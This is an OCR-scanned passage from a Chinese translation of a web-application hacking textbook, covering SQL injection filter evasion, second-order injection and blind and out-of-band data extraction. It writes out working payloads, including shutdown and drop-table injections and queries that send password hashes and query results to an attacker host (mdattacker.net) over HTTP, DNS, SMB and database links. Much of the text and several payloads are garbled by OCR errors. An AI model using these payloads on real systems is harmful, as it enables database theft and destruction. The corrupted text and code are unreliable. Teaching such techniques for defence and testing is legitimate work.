易 避 开 ， 这 时 可 尝试 使 用 各 种 技巧 。 

1. 避免 使 用 被 阻止 的 字符 


如 宁 应 用 程序 删除 或 编码 某 些 在 SQL 注入 攻击 中 经 常用 到 的 字 
符 ， 不 使 用 这 些 字 符 仍 然 能 够 实施 攻击 。 

口 如 采 要 注入 数字 数据 字段 或 列 名 称 ， 不 一 定 必须 使 用 单 引号 。 
要 在 攻击 有 效 载 傈 中 插入 字符 串 ， 不 使 用 引号 仍 可 以 做 到 这 一 点 。 这 
时 ， 可 以 通过 各 种 字符 串 函 数 ， 使 用 每 个 字符 的 ASCII 代 码 动态 构建 
一 个 字符 串 。 例 如 ， 下 面 两 个 查询 分 别 用 于 Oracle 和 MS-SQL， 它 们 等 
同 于 select ename,sal from emp where ename=‘marcus’: 

SELECT ename, sal FROM emp where ename=CHR(109) | |CHR(97) | | 

CHR (114) | |CHR(99) | |CHR(117) | |CHR(115) 


SELECT ename, sal FROM emp WHERE ename=CHAR({109)+4+CHAR (97) 
+CHAR (114) +CHAR (99) +CHAR(117})+CHAR({115) 


O WREATH, GAT AT NEARE, BEAN 
坏 周围 查询 的 语法 。 例 如 ， 不 用 注入 
t or LL 
可 以 注入 


' or ‘tat='a 


口 在 MS-SQL 数 据 库 中 注入 批量 查询 时 ， 不 必 使 用 分 号 分 隔 符 。 
只 要 纠正 所 有 批量 查询 的 语法 ， 无 论 你 是 否 使 用 分 号 ， 查 询 解 析 器 都 
会 正确 解释 它们 。 


尝试 访问 


http://mdsec.net/addressbook/71/ 
http://mdsec.net/addressbook/76/ 


2. 避免 使 用 简单 确认 
一 些 输入 确认 机 制 使 用 一 个 简单 的 黑 名 单 ， 阻 止 或 删除 任何 出 现 

在 这 个 名 单 中 的 数据 。 在 这 种 情况 下 ， 应 该 尝试 使 用 标准 的 攻击 方 
法 ， 和 寻找 确 认 和 规范 化 机 制 中 的 常见 缺陷 (如 第 2 章 所 述 ) 。 例 如 ， 如 
果 SELECT 关 键 字 被 阻止 或 删除 ， 可 以 尝试 使 用 以 下 输入 : 

SeLeCt 

SQ0Q0SELECT 

SELSELECTECT 

$53%45%40%45%434%54 


$2553%2545%2540%2545%2543%92554 


尝试 访问 


http://mdsec.net/addressbook/58/ 
http://mdsec.net/addressbook/62/ 


3. 使 用 SQL 注释 

与 C++ 一 样 ， 我 们 也 可 以 在 SQL 语句 中 插入 行内 注释 ， 注 释 内 容 
包含 在 /* 与 % 符 号 之 间 。 如 果 应 用 程序 阻止 或 删除 输入 中 的 空格 ， 可 
以 使 用 注释 “冒充 ”注入 数据 中 的 空白 符 。 例 如 : 


SELECT/*foo*/username,password/*foo*/FROM/*foo*/users 


在 MySQL 中 ， 注 释 甚 至 可 以 插入 关键 子 中 ， 这 种 方法 可 避 开 某 些 
输入 确认 过 滤 ， 同 时 保留 查询 中 的 语法 。 例 如 : 


SEL/*foo*/ECT username,password FR/*foo*/OM users 


4. 利用 有 缺陷 的 过 滤 

输入 确认 机 制 通 肖 包含 逻辑 缺陷 ， 可 对 这 些 缺 陷 加 以 利用 ， 使 被 
咀 止 的 输入 避 开 过 滤 。 多 数 情 况 下 ， 这 类 攻击 会 利用 应 用 程序 在 对 多 
个 确认 步 又 进行 排序 ， 或 未 能 以 递归 方式 应 用 净化 逻辑 方面 的 缺陷 。 
我 们 将 在 第 11 章 介绍 这 类 攻击 。 


尝试 访问 


http://mdsec.net/addressbook/67/ 


9.2.9 ”二 阶 SQL 注 入 


一 种 特别 有 益 的 避 开 过 滤 的 方法 与 二 阶 SQL 注 入 (second-order 
SQL injection) 有 关 。 当 数据 首次 插入 数据 库 中 时 ， 许 多 应 用 程序 能 
够 安全 处 理 这 些 数据 。 但 是 ， 一 旦 数据 存储 在 数据 库 中 ， 随 后 应 用 程 
序 本 身 或 其 他 后 端 进 程 可 能 会 以 危险 的 方式 处 理 这 些 数据 。 许 多 这 类 
应 用 程序 并 不 像 面 铝 因特网 的 主要 应 用 程序 一 样 安全 ， 但 却 拥 有 较 高 
权限 的 数据 库 账户 。 

在 一 些 应 用 程序 中 ， 用 户 输入 在 到 达 时 通过 转 义 单 引 号 来 进行 确 
认 。 在 前 面 搜索 书籍 的 示例 中 ， 这 种 方法 明显 有 效 。 当 用 户 输入 搜索 
项 O'Reilly 时 ， 应 用 程序 执行 以 下 查询 : 


SELECT author,title,year FROM books WHERE publisher = 'O''Reilly' 


在 这 个 查询 中 ， 用 户 提交 的 单 引 号 被 转换 为 两 个 单 引号 ， 因 而 传 
送 给 数据 库 的 搜索 项 与 用 户 最 初 输入 的 表达 式 具有 相同 的 字符 售 义 。 

与 单 引号 配对 方法 有 关 的 问题 出 现在 更 复杂 的 情形 中 ， 此 时 同一 
个 数据 项 被 提交 给 儿 个 SQL 查询 ， 然 后 写 入 数据 库 被 几 次 读 取 。 这 有 是 
于 边界 确认 存在 不 足 的 一 个 示例 ， 如 第 2 章 所 
ake 

回 到 前 面 那 个 允许 用 户 目 我 注册 并 且 在 一 个 INSERT 语 句 中 存在 
SQL 广 入 漏洞 的 应 用 程序 。 假 设 开 发 者 将 修复 出 现在 用 户 数据 中 的 所 
有 单 引 号 配对 导致 的 漏洞 。 注 册 用 户 名 foo' 来 建立 如 下 查询 ， 它 不 会 在 
数据 库 中 造成 问题 : 


目前 为 止 一 切 正常 。 然 而 ， 假 设 应 用 程序 还 执行 密码 修改 功能 ， 
那么 只 有 通过 验证 的 用 户 才 能 够 访问 这 项 功能 ， 而 且 为 了 加 强 保 扩 ， 


应 用 程序 要 求 用 户 提交 原始 密码 。 然 后 应 用 程序 从 数据 库 中 提取 用 户 
的 当前 密码 ， 并 对 两 个 字符 目 进 行 比较 ， 核 对 用 户 提供 的 密码 是 否 正 
确 。 和 
Zu iA 


SELECT password FROM users WHERE username = 'foo'' 


因为 保存 在 数据 库 中 的 用 户 名 是 字面 量 字 符 串 foo'， 当 应 用 程序 提 
出 访问 要 求 时 ， 数 据 库 即 返 回 这 个 值 ， 只 有 在 字符 种 被 传送 给 数据 库 
时 才 使 用 配对 的 转 义 序列 。 acu 当 应 用 程序 重复 使 用 这 个 字符 串 并 
将 它 奏 入 到 男 一 个 查询 中 时 ， 造成 一 个 SQL 注入 漏洞 ， 用 户 最 初 
MEEA BL BHR A Bl A 询 中 。 SPREE ON 应 用 程序 返 
回 以 下 消息 ， 暴露 了 上述 缺陷 : 


Unclosed quotation mark before the character string ‘foo 


要 利用 这 种 漏洞 ， 攻 击 者 只 需 注册 一 个 包含 专门 设计 的 输入 用 户 
和 名， 然后 莹 试 修改 密码 。 例 如 ， 如 采 注 册 如 下 用 户 名 : 


' or 1 in (select password frc users where username='admin')-- 


TEA BRS SN FB Eo CUR ES, HE 
AWE mer 导致 生成 以 下 消 轧 ， 泄 露 管理 员 的 密码 : 


rosoft. OLE DB Provider for ODBC Drivers error '80040e07' 
[Mic oft] [CODEC SQL Server Driver] [SQL Server]Syntax error converting 
the 1 char value ‘'fme69' to a column of data type 


攻击 者 已 Ss EFF ESL Ac AA, 现在 他 
能 够 在 数据 库 中 执行 任意 查询 并 获得 查询 结 


尝试 访问 : 


http://mdsec.net/addressbook/107/ 


9.2.10 “高 级 利用 


到 现在 为 止 ， 我 们 描述 的 所 有 攻击 中 ， 有 一 些 现成 的 方法 可 帮助 
从 数据 库 中 提取 有 用 的 数据 ， 例 如 ， 通 过 执行 UNION 攻 击 或 在 错误 请 
居中 返回 数据 。 随 着 人 们 防御 SQL 注 入 威胁 意识 的 增强 ， 这 种 情形 已 
经 逐渐 消失 。 如 今 ， 即 使 遇 到 SQL 注 入 漏洞 ， 攻 击 者 仍然 无 法 直接 获 
取 注 入 的 查询 的 结果 ， 这 种 情况 日 益 增 多 。 我 们 将 讨论 几 种 出 现 这 种 
问题 的 情况 ， 以 及 如 何 处 理 这 些 情况 。 


T 注解 应 用 程序 所 有 者 应 意识 到 ， 并 非 所 有 攻击 都 和 在 次 
窃 敏感 数据 。 一 些 攻击 可 能 更 具 破 坏 性 ， 例 如 ， 仅 仅 提交 12 个 字符 
的 输入 ， 攻 击 者 就 能 够 使 用 关闭 命令 (shutdown) 关闭 一 个 MS- 
SQL 数据 库 。 


' shutdown-- 


攻击 者 还 可 以 注入 恶意 命令 ， 如 下 面 这 些 命令 可 删除 一 些 数 据 库 
K: 


' drop table users-- 
' drop table accounts-- 
' drop table customers-- 


1. 获取 数字 数据 

如 果 包 含 单 引号 的 输入 得 到 正确 处 理 ， 那 么 应 用 程序 中 的 字符 串 
字段 就 不 易 受 SQL 注入 攻击 。 但 是 ， 数 字数 据 字 段 可 能 仍然 存在 漏 
洞 。 在 这 种 字段 中 ， 用 户 输 入 并 不 包含 在 单 引号 中 。 这 时 攻击 者 只 
通过 应 用 程序 的 数值 响应 (numeric response) ， 才 能 获得 注入 查询 的 
结果 。 

在 这 种 情况 下 ， 攻 击 者 需要 做 的 是 获取 数字 形式 的 有 用 数据 ， 对 
注入 查询 的 结果 进行 处 理 。 他 们 可 以 使 用 以 下 两 个 关键 函数 : 

口 ASCI1， 它 返回 输入 字符 的 ASCII 代 码 ; 

J SUBSTRING (或 Oracle 中 的 SUBSTR) ， 它 返回 输入 的 子 字符 


这 些 函 数 可 结合 在 一 起 使 用 ， 以 数字 形式 从 一 个 字符 串 中 提取 单 
独 一 个 字符 。 例 如 : 


SUBSTRING(‘Admin’ 1,1) [BJA 
ASCII(‘A’)i2 F165 


因此 


ASCII(SUBSTR(‘Admin’,1,1)) [F165 

(FIN SENN, BY LAR STH“ A AF EB BG 
个 的 字符 ， 并 以 数字 形式 分 别 返 回 每 一 个 字符 。 在 目 定义 攻击 中 ， 可 
以 利用 这 种 技巧 ， 以 一 次 一 个 字 世 的 速度 ， 迅 速 获 得 并 重建 大 量 基 于 
字符 串 的 数据 。 


V 提示 “在 处 理 字符 串 操作 和 数字 计算 方面 ， 不 同 数据 库 平 


台 之 间 存 在 大 量 细微 的 区 别 ， 当 实施 这 种 高 级 攻击 时 ， 攻 击 者 需要 
意识 到 这 类 区 别 。 通 过 以 下 地 址 可 以 找到 说 明 不 同 数据 库 之 间 这 些 
区 别 的 详细 指南 : http://sqlzoo.net/howto/source/z.dir/i08fun.xml ° 


我 们 曾经 遇 到 上 述 问题 的 男 一 种 表现 形式 ， 即 应 用 程序 返回 的 并 
不 征 真 正 的 数字 ， 而 是 一 些 以 该 数字 为 标识 符 的 资源 。 应 用 程序 根据 
用 户 的 输入 执行 一 个 SQL 查询 ， 获 得 一 个 文档 的 数字 标识 符 ， 然 后 将 


文档 的 内 容 返 回 给 用 户 。 在 这 种 情况 下 ， 攻 击 者 可 以 先 获 得 标识 符 在 
相关 数字 范围 内 的 每 一 份 文 档 的 备份 ， 然 后 在 文档 内 容 与 标识 符 之 间 
建立 映射 。 接 下 来 ， 当 实施 前 面 描述 的 攻击 时 ， 攻 击 者 就 可 以 参考 这 
个 映射 确定 应 用 程序 返回 的 每 个 文档 的 标识 符 ， 因 而 得 到 他 们 成 功 提 
取 的 字符 的 ASCII 值 。 
2. 使 用 带 外 通道 

在 许多 SQL 注入 攻击 中 ， 应 用 程序 并 不 在 用 户 的 浏览 器 中 显示 注 
入 查询 的 结果 ， 也 不 返回 数据 库 生成 的 任何 错误 消息 。 很 明显 ， 在 这 
种 情况 下 ， 即 使 一 个 SQL 注入 漏洞 确实 存在 ， 攻 击 者 也 无 法 对 其 加 以 
利用 ， 提 到 任意 数据 或 执行 任何 其 他 操作 。 但 是 ， 这 种 想法 是 错误 
的 ， 即 使 出 现 这 种 情况 ， 仍 然 可 以 使 用 各 种 技巧 获取 数据 、 确 认 其 他 
恶意 操作 是 否 取得 成 功 。 

许多 时 候 ， 可 以 注入 任意 一 个 查询 ， 但 却 无 法 获得 查询 结果 。 回 
到 那个 易 受 攻击 的 登录 表单 ， 它 的 用 户 名 和 和 密码 字段 易于 遭受 SQL 注 
入 : 


SELECT * FROM users WHERE username = 'marcus' and passworG 'secret' 
除了 修改 查询 逻辑 以 避 开 登录 外 ， 还 可 以 注入 一 个 完全 独立 的 子 


查询 ， 使 用 字符 串 连 接 符 把 这 个 子 查 询 的 结果 与 控制 的 数据 项 连接 起 
来 。 例 如 


foo’ | {SELECT 1 FROM dual WHERE {SELECT username FROM alil_users WHERE 


username = 'DBSNMP') = ‘'DBSNMP'}-- 


应 用 程序 将 执行 以 下 查询 : 

数据 库 将 执行 注入 的 任何 子 查 询 ， 并 将 它 的 结果 附加 在 foo 之 后 ， 
然后 查找 所 生成 用 户 名 的 资料 。 当 然 ， 这 种 登录 不 会 成 功 ， 但 会 执行 
注入 的 查询 。 在 应 用 程序 响应 中 收 到 的 只 是 标准 的 登录 失败 消 妃 。 现 
在 需要 想 办 法 获得 注入 查询 的 结果 。 

如 果 能 对 MS-SQL 数 据 库 使 用 批量 查询 (batch query) ， 这 时 就 会 
出 现 另 一 种 情形 。 批 量 查 询 特别 有 用 ， 因 为 它们 允许 执行 一 个 完全 独 
立 的 语句 ， 在 这 个 过 程 中 ， 活 透 测试 员 拥 有 全 部 的 控制 权 ， 可 以 使 用 
另外 的 SQL 语句 并 针对 不 同 的 表 进 行 查 询 。 但 是 ， 因 为 批量 查询 执行 
查询 的 方式 比较 特殊 ， 我 们 无 法 直接 获得 注入 查询 的 执行 结果 ， 同 样 
需要 想 办 法 获得 注入 查询 的 结果 。 


在 这 种 情况 下 ， 一 种 获取 数据 的 有 效 方 法 是 使 用 带 外 通道 。 能 够 
在 数据 库 中 执行 任意 SQL 语 句 后 ， 渗 透 测 斌 员 往 往 可 以 利用 数据 库 的 
一 些 内 置 功 能 在 数据 库 与 自己 的 计算 机 之 间 建 立 网 络 连接 ， 通 过 它 传 
送 从 数据 库 中 收集 到 的 任何 数据 。 

建立 适当 网 络 连接 的 方法 依 不 同 的 数据 库 而 定 ， 而 且 取 决 于 应 用 
程序 访问 数据 库 所 使 用 的 用 户 权限 。 下 面 将 描述 一 些 使 用 每 种 数据 库 
时 最 常用 、 最 有 效 的 技巧 。 

e MS-SQL 

一 些 老式 数据 库 ， 如 MS-SQL2000 以 及 更 早 的 版 本 ， 可 使 用 
OpenRowSet 命 令 与 外 部 数据 库 建立 连接 并 在 其 中 插入 任何 数据 。 例 
如 ， 下 面 的 查询 可 使 目标 数据 库 与 攻击 者 的 数据 库 建立 连接 ， 并 将 目 
标 数 据 库 的 版 本 字符 串 插 入 表 foo 中 : 


'DRIVER={SỌL Server};SERVER=mAattacker.net, 80;UID=sa; PWD=letmein', 


tasla 
SCL 


注意 ， 可 以 指定 端口 80， 或 者 任何 其 他 可 能 的 值 ， 以 提高 穿 透 防 
火 墙 建立 外 部 连接 的 可 能 性 。 

@ Oracle 

Oracle 中 包含 大 量 低 权限 用 户 可 访问 的 默认 功能 ， 可 以 使 用 它们 
建立 带 外 连接 © 

UTL_HTTP 包 可 用 于 问 其 他 主机 提出 任意 HTTP 请 求 。UTL_HTTP 
包含 丰富 的 功能 ， 并 支持 代理 服务 器 、cookie、 重 定 癌 和 验证 。 这 意 
味 着 ， 如 果 攻 击 者 已 经 攻破 一 个 受到 强大 保护 的 企业 内 部 网 络 中 的 数 
据 库 ， 他 就 能 够 利用 企业 代理 服务 器 与 因特网 建立 外 部 连接 。 

s 中 ，UTL_HTTP 用 于 向 攻击 者 控制 的 服务 器 传送 注 
入 查询 的 结 


/employees.asp? mpNo=7521" | |UTL_HTIP.request ('mdattacker.net:80/'| | 
(SELECTS2 0username32 0FROM$20al11_userst2 CWHERES20ROWNUMS3d1) } -- 


rom foo sion) 


这 个 URL 促 使 UTL_HTTP 提 出 一 个 GET 请 求 ， 要 求 访问 包含 
all _users 表 中 人 第 一 个 用 户 名 的 URL 。 攻 击 者 只 需 在 mdattackernet 安 装 一 
个 netcat 监 昕 器 就 可 以 收 到 结果 。 


C:\>ne -ALO 80 

SET 7929 HTTP/ 141 
Host: mdattacker.net 
Connection: close 


UTL_INADDR 包 则 在 将 主机 名 解析 为 IP 地 址 。 它 可 用 于 在 攻击 者 
控制 的 服务 器 中 生成 任意 DNS 查询 。 许 多 时 候 ， 相 比 于 UTL_HTTP 攻 
击 ， 这 类 攻击 更 可 能 取得 成 功 ， 因 为 即使 HTITP 流 量 被 阻止 ， 通 常 DNS 
流量 仍然 能 够 穿 透 企业 防火 墙 。 攻 击 者 能 够 利用 这 个 包 查 找 选 择 的 主 
I 
意 数 据 ， 例 如 : 


emp.oy -as py 
20FROM$20D2BA_USERS$20WHERES20NAME='SYS') ||'.mdattacker.net') 


它 癌 包含 SYS 用 户 的 密码 散 列 (password hash) 的 mdattacker.net 
名 称 服 务 融 发 出 下 面 这 个 DNS 查询 : 


pioyees.asp?EmpNo=7521 


DCB748A5BC5390F2 .mdattacker.net 


UTL_SMTP 包 可 用 于 发 送 电子 邮件 。 在 出 站 电子 邮件 中 发 送 这 个 
包 ， 即 可 获得 大 量 从 数据 库 中 截取 的 数据 。 
UTL _TCP 包 可 用 于 打开 任意 TCP 套 接 字 ， 以 发 送 和 接收 网 络 数 
TE o 


T 注解 在 Orade 11g 中 ，ACL 为 上 壕 许 多 资源 提供 保护 ， 以 
防止 任意 数据 库 用 户 执行 恶意 操作 。 只 需 研究 一 下 Oracle 11g 中 提供 


的 新 功能 ， 就 可 以 轻松 避 开 该 ACL， 使 用 以 下 代码 即 可 实现 : 
SYS.DBMS_LDAP.INIT((SELECT PASSWORD FROM 
SYS.USER$ WHERE NAME=‘SYS’)||‘.mdsec.net’,80) 


@ MySQL 


SELECT...INTO OUTFILE 命 令 可 将 任意 一 个 查询 的 输出 指 癌 一 个 
文件 。 指 定 的 文件 名 可 包含 UNC 路 人 径 ， 人 允许 将 输出 指 癌 目 己 计算 机 上 
的 一 个 文件 。 例 如 : 


select * inte outfile '\\\\mdattacker.net\\share\\output.txt' from users; 


要 想 接 收 到 文件 ， 必 须 在 计算 机 上 建立 SMB 共 享 ， 人 允许 匿名 写 入 
访问 。 可 以 在 基于 Windows 和 UNIX 的 平台 上 配置 共享 ， 以 实现 匿名 写 
入 。 如 果 无 法 接收 到 输出 的 文件 ， 可 能 是 因为 SMB 服 务 器 的 配置 有 问 
题 。 可 以 使 用 一 个 嗅 探 器 确定 目标 服务 器 是 否 与 指定 计算 机 建立 了 入 
站 连接 (inbound connection) ， 如 果 连 接 已 经 建立 ， 参 考 服务 器 文档 
资料 确保 它 得 到 正确 配置 。 

@ 利用 操作 系统 

通常 可 以 在 数据 库 服务 器 的 操作 系统 上 执行 任意 命令 ， 以 此 实施 
权限 提升 攻击 。 这 时 ， 攻 击 者 可 以 采用 许多 手段 获得 数据 ， 如 使 用 
tftp、mail 和 telnet 等 内 置 命令 ， 或 者 将 数据 复制 到 Web 根 目录 使 用 浏览 
器 获取 。 请 参阅 9.2.11 节 了 解 提 升 数 据 库 权限 的 各 种 技巧 。 

3. 使 用 推论 ， 条件 式 响应 

造成 带 外 通道 不 可 用 的 原因 有 许多 。 大 多 数 情况 下 ， 是 因为 数据 
库 处 在 一 个 受 保护 的 网 络 中 ， 它 的 边界 防火 墙 禁止 任何 与 因特网 或 其 
他 网 络 的 带 外 连接 。 这 时 ， 只 能 通过 Web 应 用 程序 注入 点 (injection 
point) 访问 数据 库 。 

在 这 种 情况 下 ， 攻 击 或 多 或 少 带 有 盲目 性 质 ， 但 攻击 者 仍然 可 以 
使 用 各 种 技巧 从 数据 库 中 获得 任意 数据 。 这 些 技 巧 全 都 基于 如 下 概 
念 : 使 用 一 个 注入 查询 有 条 件 地 在 数据 库 中 触发 某 种 可 以 探测 的 行 
为 ， 然 后 根据 这 种 行为 是 否 发 生 推 断 出 所 需 信息 。 

回 到 那个 可 注入 用 户 名 和 密码 字段 以 执行 任意 查询 的 登录 功能 : 


假设 还 没有 找到 将 注入 查询 的 结果 返回 给 浏览 器 的 方法 ， 但 我 们 
已 经 知道 如 何 使 用 SQL 注 入 改变 应 用 程序 的 行为 。 例 如 ， 提 交 下 面 两 
个 输入 将 得 到 截然 不 同 的 结 
admin' AND 1=1-- 
admin' AND 1=2-- 


在 第 一 种 情况 中 ， 应 用 程序 将 允许 攻击 者 以 管理 员 的 身份 登录 。 
在 第 二 种 情况 中 ， 登 录 党 试 将 会 失败 ， 因 为 1=2 这 个 条 件 总 为 假 。 可 
以 利用 这 种 应 用 程序 行为 控制 推断 数据 库 中 任意 条 件 的 真 假 。 例 如 ， 
使 用 前 面 描述 的 ASCII 和 SUBSTRING 函 数 ， 攻 击 者 可 以 测试 截获 字符 
串 中 的 一 个 字符 是 否 为 特定 的 值 。 例 如 ， 提 交 下 面 这 上 段 输入 将 允许 攻 
击 者 以 管理 员 身 份 登录 ， 因 为 经 测试 条 件 为 真 : 


admin' AND ASCII(SUBSTRING('Admin',1,1)) = 65-- 


但 是 ， 提 交 下 面 的 输入 ， 登 孙 不 会 取得 成 功 ， 因 为 经 测试 条 件 为 
假 : 


admin' AND ASCII{SUBSTRING('AdGmin',1,1)) = 66-- 


提交 大 量 这 夫 碍 询 ， 循 环 每 个 字符 的 所 有 可 能 的 ASCII 编 码 ， 下 
到 出 现 一 个 “ 触 点 ”>， 束 能 够 以 每 次 一 个 字 节 的 速度 ， 提 取出 整个 字符 


@ 引发 条 件 性 错误 

在 前 面 的 示例 中 ， 应 用 程序 拥有 一 些 主要 功能 ， 可 以 通过 注入 一 
个 现 有 的 SQL 查询 直接 控制 它们 的 逻辑 。 攻 击 者 能 够 劫持 应 用 程序 计 
划 执 行 的 行为 (成 功 或 失败 的 登录 ) 以 获得 想 要 的 信息 。 然 和 而， 并非 
所 有 攻击 都 这 样 简单 。 有 时 ， 注 入 的 查询 并 不 会 给 应 用 程序 的 行为 
(如 日 志 机 制 ) 造成 直接 影响 。 或 者 ， 应 用 程序 并 不 处 理 注 入 的 一 个 
子 查询 或 批量 查询 。 在 这 种 情况 下 ， 攻 击 者 必须 根据 特定 的 条 件 ， 争 
取 在 应 用 程序 中 造成 可 探测 的 行为 差异 。 

David Litchfield 发 现 了 一 种 技巧 ， 可 在 大 多 数 情况 下 触发 可 探测 
的 行为 差异 。 其 核心 理念 是 注入 一 个 查询 ， 依 照 某 个 特定 的 条 件 引发 
一 个 数据 库 错 误 。 如 果 发 生 数 据 库 错误 ， 可 以 通过 HTTP500 响 应 码 ， 
或 者 通过 某 种 错误 消息 或 反常 行为 (即使 错误 消息 本 身 并 未 揭示 任何 
有 用 的 信息 ) ， 从 外 部 探测 到 这 个 错误 。 

这 种 技巧 利用 了 数据 库 在 求 条 件 语句 的 值 时 表现 出 的 一 个 行为 特 
点 : 数据 库 将 根据 其 他 部 分 的 情况 ， 仅 对 那些 需要 求 值 的 语句 部 分 求 
a ae gerade ea Weare 
示例 : 


SELECT X FROM Y WHERE C 


这 条 语句 使 数据 库 访 问 表 Y 的 每 一 行 ， 评 估 条 件 C。 如 果 条 件 C 为 
真 ， 返 回 X。 如 果 条 件 C 永 为 假 ， 永 远 不 求 出 表达 式 X 的 值 。 

可 以 找到 一 个 语法 有 效 但 如 果 求 值 就 会 生成 错误 的 表达 式 X， 对 
这 种 行为 加 以 利用 。 在 Oracle 与 MS-SQL 中， 被 去除 计算 就 是 这 样 的 表 
达 式 ， 如 1/0。 如 果 条 件 C 为 真 ， 那 么 求 表达 式 X 的 值 ， 这 造成 一 个 数 
据 库 错误 。 如 果 条 件 C 为 假 ， 就 不 会 发 生 错误 。 因 此 ， 可 以 通过 是 否 
发 生 错误 测试 任意 一 个 条 件 C。 

下 面 的 查询 就 是 一 个 典型 的 示例 ， 它 查询 默认 的 Oracle 用 户 
DBSNMP 是 否 存在 。 如 果 该 用 户 存在 ， 职 会 求 表 达 式 1/0 的 值 ， 造 成 一 


个 错误 IR °? 


er 因为 WHERE 条 件 
水 为 假 ， 所 以 不 求 表 达 式 /0 的 值 ， 因 而 不 会 发 生 错误 。 


SELECT 1/0 FROM dual WHERE (SELECT username FROM ail users WHERE username = 
AAAAAA') = LAAAAA, ' 


这 种 技巧 的 目的 是 在 应 用 程序 中 引发 一 个 条 件 性 啊 应 ， 即 使 注入 
的 查询 不 会 给 应 用 程序 的 逻辑 或 数据 处 理 造 成 影响 。 因 此 ， 利 用 它 束 
可 以 使 用 前 面 描 述 的 推论 技巧 在 各 种 情况 下 提取 到 所 需要 的 数据 。 而 
且 ， 由 于 这 种 技巧 非常 人 简单， 相同 的 攻击 字符 串 可 应 用 于 一 系列 数据 
库 ， 其 中 的 注入 点 则 位 于 各 种 类 型 的 SQL 语 句 中 。 

这 种 技巧 的 用 途 非 党 广泛 ， 因 为 它 可 以 用 在 可 以 注入 子 碍 询 的 各 
种 注入 点 中 。 例 如 : 


(select 1 where <<condition>> or 1/0=0) 


以 一 个 提供 可 搜索 并 可 排序 的 联系 人 数据 库 的 应 用 程序 为 例 。 用 
户 控 制 着 department 和 和 sort 参 数 : 


/search.jsp?department=30&sort=ename 


以 上 代码 出 现在 以 下 后 端 查询 中 ， 该 查询 确定 了 department 参 数 的 
值 ， 但 将 sort 参 数 连 接 到 查询 中 : 


String queryText = “SELECT ename, joh,deptno,hiradate FROM emp WEERE deptno = ? 
ORDER BY “ + request.cgetParameter(”"sort") + * DESC"; 


攻击 者 无 法 修改 WHERE 子 句 或 在 ORDER BY 子 句 后 进行 UNION 
查询 ， 但 攻击 者 可 以 通过 以 下 语句 建立 某 种 推断 条 件 : 


) m%20dual *20wheret20 


/search. ]sprdepartment=20&éscrt=(select42t 


(object_name),1,12 } S20FROM320 iser_objects jety’) 


如 果 user_objects 表 中 的 第 一 个 对 象 名 称 的 第 一 个 字母 等 于 "Y:， 将 
导致 数据 库 演 试 对 1/0 求 值 ， 这 会 导致 错误 ， 整 个 查询 不 会 返回 任何 结 
果 。 如 果 第 一 个 字母 不 等 于 ‘Y?*， 原 始 查 询 的 结果 将 按 默 认 顺 序 返 回 。 
通过 对 Absinthe 或 SQLMap 之 类 的 SQL 注入 工具 仔细 设 定 这 个 条 件 ， 我 
们 可 以 检索 数据 库 中 的 每 一 条 记录 。 

@ 使 用 时 间 延 迟 

尽管 前 面 已 经 描述 了 各 种 复杂 的 技巧 ， 但 是 ， 有 些 时 候 ， 这 些 技 
巧 可 能 全 部 无 效 。 有 些 情况 下 ， 可 以 注入 一 个 不 会 在 浏览 器 中 显示 结 
果 的 查询 ， 但 由 于 无 法 建立 带 外 通道 ， 即 使 它 在 数据 库 中 引发 错误 ， 
也 并 不 会 给 应 用 程序 的 行为 造成 任何 影响 。 

在 这 种 情况 下 ， 笠 亏 NGSSoftware 的 Chris Anley 和 Sherief Hammad 
发 现 了 一 个 技巧 ， 我 们 才 不 至 于 手足 无 措 。 他 们 发 现 一 种 方法 ， 设 计 
出 一 个 根据 攻击 者 指定 的 条 件 造 成 时 间 延 迟 的 查询 。 攻 击 者 可 以 提交 
他 设计 的 查询 ， 然 后 监控 服务 器 做 出 啊 应 所 花 的 时 间 。 如 果 发 生 延 
迟 ， 攻 击 者 可 推断 条 件 为 真 。 即 使 在 两 种 情况 下 应 用 程序 的 啊 应 完全 
相同 ， 攻 击 者 仍然 可 根据 是 否 存 在 时 间 延 退 从 数据 库 中 提取 一 比特 数 
据 。 通 过 大 量 执行 这 类 查询 ， 攻 击 者 就 能 够 系统 性 地 从 数据 库 中 提取 
任何 复杂 的 数据 ， 每 次 一 比特 。 

引发 适当 时 间 延 迟 方 法 的 精确 性 取决 于 所 使 用 的 目标 数据 库 。 
MS-SQL 中 包含 一 个 内 置 WAITFOR 命 令 ， 可 用 于 引起 一 个 指定 的 时 间 
延迟 。 例 如 ， 如 果 当 前 数据 库 用 户 为 aa， 下 面 的 查询 将 造成 5 秒 钟 的 时 
[A] WEIR : 


if (select user) = 'sa' waitfor delay '0:0:5' 


使 用 这 个 命令 ， 攻 击 者 束 能 够 以 各 种 方式 提取 任何 信息 。 一 种 方 
法 是 利用 前 面 已 经 描述 的 、 在 应 用 程序 返回 条 件 性 啊 应 时 用 到 的 相同 
技巧 。 现 在 ， 如 采 满 足 一 个 特殊 条 件 ， 注 入 的 碍 询 束 不 再 触发 一 个 不 
同 的 应 用 程序 啊 应 ， 相 反 ， 它 引发 一 次 时 间 延 迟 。 例 如 ， 下 面 的 第 二 
个 得 询 将 引发 一 次 时 间 延 返 ， 表 示 被 截获 字符 串 的 第 一 个 字母 为 A。 


if ASCII(SUBSTRINGI'RARdmin1 ,1,1)) = 64 waitfor delay '0:0:5' 
if ASCII(SUBSTRING('Admin',1,1}} = 65 waitfor delay '0:0:5' 


和 前 面 一 样 ， 攻 击 者 可 以 循环 使 用 每 个 字符 的 所 有 可 能 值 ， 直 到 
发 生 时 间 延 迟 。 另 外 ， 可 以 通过 减少 所 需 请 求 的 数量 ， 提 高 攻击 的 效 
率 。 男 一 个 技巧 是 将 每 个 字 市 的 数据 划分 成 比特 ， 并 在 每 次 查询 中 获 
得 一 比特 的 数据 。POWER 命 令 和 按 位 “与 ”运算 符 & 可 在 arn 
上 指定 条 件 。 例 如 ， 以 下 查询 测试 个 截获 数据 的 第 一 字 市 的 第 
等 ， 如 采 其 值 为 1， 终 止 查询 : 


if ASCIT {SUBSTRING{‘*AGmin',1,1}) & (POWER ) > 0 waitfor delay '0:0:5' 
下 面 的 查询 对 第 二 比特 执行 相同 的 wit, 
if (ASCII(SUBSTRING(‘Admin',1,1)) & {POWER(2,1))) > 0 waitfor elay '0:0:5 


sai, 这 种 引发 时 间 延 迟 方法 的 准确 性 在 很 大 程度 上 取决 于 
所 使 用 的 数据 库 。 在 当前 版 本 的 My-SQL 中 ， 睡 眠 函数 可 创建 指定 时 
间 的 时 间 延 迟 ， 例 如 : 


select if(user() like '‘root@%$', sleep(5000), 'false') 


